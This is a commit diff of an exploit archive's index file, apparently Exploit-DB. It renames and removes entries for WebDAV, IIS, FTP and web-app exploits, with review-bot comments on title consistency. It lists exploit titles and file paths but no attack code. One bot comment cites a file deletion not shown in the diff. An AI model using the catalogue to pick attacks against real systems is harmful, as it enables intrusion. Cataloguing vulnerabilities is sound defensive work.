DB: 2016-05-17

12 new exploits

Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit
Microsoft Windows WebDAV - Remote PoC Exploit
Microsoft Windows IIS WebDAV - 'ntdll.dll' Remote Exploit
Microsoft Windows IIS 5.0 WebDAV - Remote PoC Exploit

Microsoft Windows WebDav II - Remote Root Exploit (2)
Microsoft Windows WebDAV - Remote Root Exploit (2)

Microsoft Windows WebDav III - Remote Root Exploit (xwdav)
Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)

Dream FTP 1.2 - Remote Format String Exploit
BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit

Apache Tomcat (webdav) - Remote File Disclosure Exploit
Apache Tomcat (WebDAV) - Remote File Disclosure Exploit

Apache Tomcat (webdav) - Remote File Disclosure Exploit (ssl support)
Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL)

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)
Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (PHP)
Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP)

Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC
Windows 7 IIS 7.5 - FTPSVC UNAUTH'D Remote DoS PoC

Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow

Liferay 6.0.x Webdav File Reading Vulnerability
Liferay 6.0.x WebDAV - File Reading Vulnerability

Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities
Microsoft IIS 6.0 and 7.5 (+ PHP) - Multiple Vulnerabilities
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1)
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2)
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (1)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (2)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (3)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (4)

BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (2)

Sun Solaris 8/9 - Unspecified Passwd Local Root Compromise Vulnerability

Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1)

Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness

Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
Apache HTTP Server <= 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness

MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit

Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
Apache Struts 2.0.0 <= 2.2.1.1 -  XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability

EasyCafe Server <= 2.2.14 Remote File Read
EasyCafe Server <= 2.2.14 - Remote File Read
x86_64 Linux bind TCP port shellcode
TCP Bindshell with Password Prompt - 162 bytes
x86_64 Linux bind TCP port shellcode
TCP Bindshell with Password Prompt - 162 bytes

Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)
CakePHP Framework 3.2.4 - IP Spoofing
Multiples Nexon Games - Unquoted Path Privilege Escalation
eXtplorer 2.1.9 - Archive Path Traversal
Web interface for DNSmasq / Mikrotik - SQL Injection
Microsoft Excel 2010 - Crash PoC
Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation
Web2py 2.14.5 - Multiple Vulnerabilities
Offensive Security 2016-05-17 05:03:19 +00:00
parent 4a2ec207ee
commit 8fea20e59f
18 changed files with 1008 additions and 1094 deletions


@ -1,6 +1,6 @@
id,file,description,date,author,platform,type,port
1,platforms/windows/remote/1.c,"Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft Windows WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80
1,platforms/windows/remote/1.c,"Microsoft Windows IIS WebDAV - 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft Windows IIS 5.0 WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - ptrace/kmod Local Root Exploit",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0
5,platforms/windows/remote/5.c,"Microsoft Windows RPC Locator Service - Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
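Review bot: the two renamed titles in this hunk describe the same 2003 ntdll.dll WebDAV issue but name the product differently: entry 1 becomes "Microsoft Windows IIS WebDAV" while entry 2 becomes "Microsoft Windows IIS 5.0 WebDAV". Since the rest of this commit settles on the "IIS 5.0 WebDAV - ntdll.dll" form (see entries 16470 and 22365-22368 below), entry 1 should carry the version as well so the two adjacent records sort and search consistently.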
@ -34,7 +34,7 @@ id,file,description,date,author,platform,type,port
33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000
34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) Remote Exploit",2003-05-29,N/A,linux,remote,80
35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0
36,platforms/windows/remote/36.c,"Microsoft Windows WebDav II - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80
36,platforms/windows/remote/36.c,"Microsoft Windows WebDAV - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80
37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69
@ -49,7 +49,7 @@ id,file,description,date,author,platform,type,port
48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25
50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80
51,platforms/windows/remote/51.c,"Microsoft Windows WebDav III - Remote Root Exploit (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
51,platforms/windows/remote/51.c,"Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0
53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit",2003-07-10,knight420,cgi,webapps,0
54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21
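Review bot: word order in the new title for entry 51, "Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)", differs from the "IIS 5.0 WebDAV" ordering used everywhere else in this commit, and entry 36 in the previous hunk ("Microsoft Windows WebDAV - Remote Root Exploit (2)") omits the IIS version entirely. Suggest "Microsoft Windows IIS 5.0 WebDAV - Remote Root Exploit (3) (xwdav)" here and the matching form for entry 36, so the (2)/(3) series reads as one family.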
@ -645,7 +645,7 @@ id,file,description,date,author,platform,type,port
819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote BoF (French Win OS support)",2005-02-15,"Jerome Athias",windows,remote,80
820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0
822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21
823,platforms/windows/remote/823.c,"Dream FTP 1.2 - Remote Format String Exploit",2004-02-11,Skylined,windows,remote,21
823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21
824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated)",2005-09-13,Qnix,linux,local,0
825,platforms/windows/remote/825.c,"3Com Ftp Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21
826,platforms/linux/remote/826.c,"Medal of Honor Spearhead Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203
@ -4175,7 +4175,7 @@ id,file,description,date,author,platform,type,port
4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script Remote SQL Injection Vulnerability",2007-10-13,"Khashayar Fereidani",php,webapps,0
4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module Remote SQL Injection Vulnerability",2007-10-13,"Mehmet Ince",php,webapps,0
4529,platforms/cgi/webapps/4529.txt,"WWWISIS <= 7.1 (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0
4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (webdav) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0
4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0
4531,platforms/windows/local/4531.py,"jetAudio 7.x (m3u File) Local SEH Overwrite Exploit",2007-10-14,h07,windows,local,0
4532,platforms/linux/dos/4532.pl,"eXtremail <= 2.1.1 memmove() Remote Denial of Service Exploit",2007-10-15,mu-b,linux,dos,0
4533,platforms/linux/remote/4533.c,"eXtremail <= 2.1.1 (LOGIN) Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,4501
@ -4197,7 +4197,7 @@ id,file,description,date,author,platform,type,port
4549,platforms/php/webapps/4549.txt,"PHP Project Management <= 0.8.10 - Multiple RFI / LFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0
4550,platforms/php/webapps/4550.pl,"BBPortalS <= 2.0 - Remote Blind SQL Injection Exploit",2007-10-21,Max007,php,webapps,0
4551,platforms/php/webapps/4551.txt,"PeopleAggregator <= 1.2pre6-release-53 - Multiple RFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0
4552,platforms/linux/remote/4552.pl,"Apache Tomcat (webdav) - Remote File Disclosure Exploit (ssl support)",2007-10-21,h3rcul3s,linux,remote,0
4552,platforms/linux/remote/4552.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL)",2007-10-21,h3rcul3s,linux,remote,0
4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions safe_mode and disable_function bypass",2007-10-22,shinnai,windows,local,0
4554,platforms/php/webapps/4554.txt,"SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability",2007-10-22,BiNgZa,php,webapps,0
4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 scripture.php Remote File Inclusion Vulnerability",2007-10-22,GoLd_M,php,webapps,0
@ -8253,7 +8253,7 @@ id,file,description,date,author,platform,type,port
8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability",2009-05-20,snakespc,php,webapps,0
8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Remote Arbitrary Remove Projects/Tasks Vulnerabilities",2009-05-20,YEnH4ckEr,php,webapps,0
8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (Updated)",2009-05-20,"Landon Fuller",osx,remote,0
8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0
8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0
8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection Vulnerability",2009-05-21,Striker7,php,webapps,0
8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0
8757,platforms/windows/remote/8757.html,"BaoFeng (config.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0
@ -8263,7 +8263,7 @@ id,file,description,date,author,platform,type,port
8762,platforms/php/webapps/8762.txt,"Article Directory (page.php) Remote Blind SQL Injection Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0
8763,platforms/php/webapps/8763.txt,"ZaoCMS Insecure Cookie Handling Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0
8764,platforms/php/webapps/8764.txt,"ZaoCMS (download.php) Remote File Disclosure Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0
8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0
8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0
8766,platforms/php/webapps/8766.txt,"Tutorial Share <= 3.5.0 Insecure Cookie Handling Vulnerability",2009-05-22,Evil-Cod3r,php,webapps,0
8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0
8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) Remote SQL Injection Vulnerability",2009-05-22,Qabandi,php,webapps,0
@ -13650,7 +13650,7 @@ id,file,description,date,author,platform,type,port
15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0
15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0
15803,platforms/windows/dos/15803.py,"Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0
15803,platforms/windows/dos/15803.py,"Windows 7 IIS 7.5 - FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0
15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0
15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - (.m3u) Buffer Overflow",2010-12-11,zota,windows,local,0
15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0
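Review bot: entry 15803 is the only id in this region that is out of sequence (it sits between 15723 and 15725 with a 2010-12-21 date among 2010-12-10/11 records). Since this hunk already rewrites that line, it is the natural moment to move it to its numeric position; tooling that assumes files.csv is id-ordered would otherwise keep tripping over it.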
@ -14267,7 +14267,7 @@ id,file,description,date,author,platform,type,port
16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS CGI Filename Double Decode Command Execution",2011-01-08,metasploit,windows,remote,0
16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - (.htr) Path Overflow",2010-04-30,metasploit,windows,remote,0
16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 Printer Host Header Overflow",2010-04-30,metasploit,windows,remote,0
16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow",2010-07-25,metasploit,windows,remote,0
16470,platforms/windows/remote/16470.rb,"Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow",2010-07-25,metasploit,windows,remote,0
16471,platforms/windows/remote/16471.rb,"Microsoft IIS WebDAV Write Access Code Execution",2010-09-20,metasploit,windows,remote,0
16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 IDQ Path Overflow",2010-06-15,metasploit,windows,remote,0
16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow",2010-06-22,metasploit,windows,remote,0
@ -16239,7 +16239,7 @@ id,file,description,date,author,platform,type,port
18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,metasploit,windows,local,0
18761,platforms/linux/remote/18761.rb,"Adobe Flash Player ActionScript Launch Command Execution Vulnerability",2012-04-20,metasploit,linux,remote,0
18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0
18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x Webdav File Reading Vulnerability",2012-04-22,"Jelmer Kuperus",multiple,remote,0
18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x WebDAV - File Reading Vulnerability",2012-04-22,"Jelmer Kuperus",multiple,remote,0
18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) Multiple XSS",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0
18765,platforms/windows/dos/18765.txt,"samsung net-i ware <= 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0
18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST CSRF",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0
@ -16436,7 +16436,7 @@ id,file,description,date,author,platform,type,port
19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection Vulnerability",2012-06-08,"Easy Laster",php,webapps,0
19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 DEBUG Vulnerability",1988-08-01,anonymous,linux,remote,0
19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x SQL Injection Vulnerability",2012-06-10,"Easy Laster",php,webapps,0
19033,platforms/windows/remote/19033.txt,"Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 and 7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0
19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0
19036,platforms/php/webapps/19036.php,"WordPress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0
@ -19612,10 +19612,10 @@ id,file,description,date,author,platform,type,port
22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Vulnerability (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0
22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Vulnerability (2)",2003-04-10,"Wojciech Purczynski",linux,local,0
22364,platforms/cgi/webapps/22364.c,"Outblaze Webmail - Cookie Authentication Bypass Vulnerability",2003-03-17,"dong-h0un U",cgi,webapps,0
22365,platforms/windows/remote/22365.pl,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1)",2003-03-24,mat,windows,remote,0
22366,platforms/windows/remote/22366.c,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2)",2003-03-31,ThreaT,windows,remote,0
22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0
22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0
22365,platforms/windows/remote/22365.pl,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (1)",2003-03-24,mat,windows,remote,0
22366,platforms/windows/remote/22366.c,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (2)",2003-03-31,ThreaT,windows,remote,0
22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0
22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0
22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x UUEncoding Parsing Memory Corruption Vulnerability",2003-03-17,"Core Security",linux,remote,0
22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0
22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion Vulnerability",2003-03-19,"Core Security",linux,remote,0
@ -20874,7 +20874,6 @@ id,file,description,date,author,platform,type,port
23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout Vulnerability",2004-02-06,"Markus Mueller",linux,local,0
23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing Vulnerability",2004-02-06,"Tri Huynh",cgi,webapps,0
23660,platforms/windows/dos/23660.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (1)",2004-02-07,shaun2k2,windows,dos,0
23661,platforms/windows/remote/23661.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (2)",2004-02-07,Skylined,windows,remote,0
23662,platforms/linux/dos/23662.c,"Nadeo Game Engine Remote Denial of Service Vulnerability",2004-02-09,scrap,linux,dos,0
23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 - 'News' Module Cross-Site Scripting Vulnerability",2004-02-09,"Janek Vind",php,webapps,0
23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 Results.STM Post Request Buffer Overflow Vulnerability",2004-02-09,nd@felinemenace.org,windows,dos,0
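Review bot: removing entry 23661 leaves its sibling 23660, "BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (1)", with a "(1)" suffix that no longer has a "(2)" counterpart in the file. If 23661 is being dropped as a duplicate of 823 (same author, Skylined, and same Dream FTP user-name format string bug, renamed earlier in this diff), 23660 should be retitled without the numeral in the same commit, and the corresponding platforms/windows/remote/23661.c removal should be among the 18 changed files.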
@ -20968,7 +20967,6 @@ id,file,description,date,author,platform,type,port
23762,platforms/windows/dos/23762.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (3)",2004-02-26,shaun2k2,windows,dos,0
23763,platforms/windows/remote/23763.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (4)",2004-02-26,lion,windows,remote,0
23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 Error Page Cross-Site Scripting Vulnerability",2004-02-26,Soby,hardware,remote,0
23765,platforms/solaris/local/23765.c,"Sun Solaris 8/9 - Unspecified Passwd Local Root Compromise Vulnerability",2004-02-27,"Marco Ivaldi",solaris,local,0
23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage Vulnerability",2004-02-27,iDefense,windows,remote,0
23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0
23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability",2003-09-11,Jelmer,windows,remote,0
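Review bot: entry 23765 (Sun Solaris 8/9 passwd local root, Marco Ivaldi) is removed with no replacement or renamed duplicate visible anywhere in this diff, and the commit summary at the top lists the title without saying why it goes. A one-line reason in the commit message (duplicate of which id, or withdrawn at author request) would make the removal auditable later; as it stands the history only shows the record disappearing.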
@ -25279,7 +25277,6 @@ id,file,description,date,author,platform,type,port
28218,platforms/php/webapps/28218.txt,"Koobi Pro 5.6 showtopic Module toid Parameter XSS",2006-07-13,"Evampire chiristof",php,webapps,0
28219,platforms/php/webapps/28219.txt,"Koobi Pro 5.6 showtopic Module toid Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0
28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x ReplaceChild Denial of Service Vulnerability",2006-07-14,hdm,linux,dos,0
28221,platforms/php/webapps/28221.pl,"Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1)",2006-07-13,1dt.w0lf,php,webapps,0
28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0
28223,platforms/php/webapps/28223.txt,"Subberz Lite UserFunc Remote File Include Vulnerability",2006-07-14,"Chironex Fleckeri",php,webapps,0
28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0
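Review bot: the removed title "Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1)" carries a "(1)" suffix, which implies a "(2)" record that is not touched in this diff and will now be numbered alone. The platforms/php/webapps/28221.pl deletion further down in this commit matches this CSV removal, but the surviving counterpart should be retitled in the same change so the numbering does not dangle.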
@ -25475,7 +25472,7 @@ id,file,description,date,author,platform,type,port
28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0
28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.PHP Cross-Site Scripting Vulnerability",2006-08-21,night_warrior771,php,webapps,0
28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.PHP Remote File Include Vulnerability",2006-08-22,Root3r_H3ll,php,webapps,0
28424,platforms/linux/remote/28424.txt,"Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0
28424,platforms/linux/remote/28424.txt,"Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0
28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure Vulnerability",2006-03-27,anonymous,solaris,local,0
28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0
28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution Vulnerability",2006-08-18,anonymous,novell,local,0
@ -27760,7 +27757,7 @@ id,file,description,date,author,platform,type,port
30832,platforms/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper Class ActiveX Control Remote Buffer Overflow Denial of Service Vulnerability",2007-11-29,"Elazar Broad",windows,dos,0
30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN My.Logon.PHP3 - Cross-Site Scripting Vulnerability",2007-11-30,"Richard Brain",hardware,remote,0
30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.PHP3 - Cross-Site Scripting Vulnerability",2007-11-10,"Adrian Pastor",hardware,remote,0
30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0
30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0
30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.PHP SQL Injection Vulnerability",2007-11-30,Lostmon,php,webapps,0
30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service Vulnerability",2007-11-30,TeLeMan,linux,dos,0
30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x_Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering Vulnerability",2007-12-01,"Carl Hardwick",multiple,remote,0
